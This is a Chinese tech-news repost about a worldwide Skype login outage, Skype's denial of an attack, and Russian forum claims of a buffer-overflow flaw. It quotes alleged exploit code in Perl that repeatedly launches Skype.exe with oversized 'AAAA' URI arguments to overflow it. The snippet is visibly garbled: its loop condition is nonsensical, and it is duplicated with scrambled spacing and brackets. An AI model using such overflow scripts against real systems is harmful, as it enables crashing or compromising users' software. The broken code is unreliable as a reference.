Skype登陆故障否认被黑 俄黑客称负责并公布源码

2018-06-11    来源:

容器云强势上线!快速搭建集群,上万Linux镜像随意使用

自8月16日下午4时起,Skype用户突然发现无法正登录。Skype立即发出官方消息,否认是系统崩溃或黑客攻击,并告知用户恢复故障需要大约24小时的时间。翌日,Skype发布新版本V3.5.0.214 Beta,业内分指出这很有可能是为了解决遇到的登陆问题而临时发布的。
在发布新版的同时,登录问题已经超过官方给出的24小时。直至18日,Skype的登录系统才基本恢复正常。
不过就在19日,来自俄罗斯论坛的一些帖子认为,此次世界范围内Skype无法登录是源于俄罗斯黑客所为,他们宣称发现了一个本地缓冲区溢出漏洞,可以伪造信息骗过Skype的认证服务器,并放出了部分溢出代码,从代码上看的确有一些问题,但是Skype官方却否认了这种说法。

俄黑客公布的漏洞代码:
 ! / usr / bin / perl # Simle Code by Maranax Porex; D # Skaypeg Ya! ! for 
($i=256; $i>xCCCCC; $i=$i+256) { $eot='AAAA' x $i; call_sp(); } exit;
sub call_sp() { $str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\"";
system("$str"); } for ($ i = 256; $ i> xCCCCC; $ i = $ 256 i)
($ eot = 'AAAA' x $ i; call_sp ();) exit; sub call_sp ()
($ str = "\" C : \ \ Program Files \ \ Skype \ \ Phone \ \ Skype.exe \ "\" / uri : $ eot \ "";
system ($ str);)

联想到之前Skype在系统故障时还有闲情推出新版本,不由得不让人觉得新版本的Skype正是解决某些系统漏洞而推出的。


标签: 代码 服务器 漏洞 问题 用户

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点!
本站所提供的图片等素材,版权归原作者所有,如需使用,请与原作者联系。

上一篇:雅虎通网络摄像头可招致零日攻击 疑为中国黑客所为

下一篇:微软报告:Linux漏洞比Windows更多 英媒体证实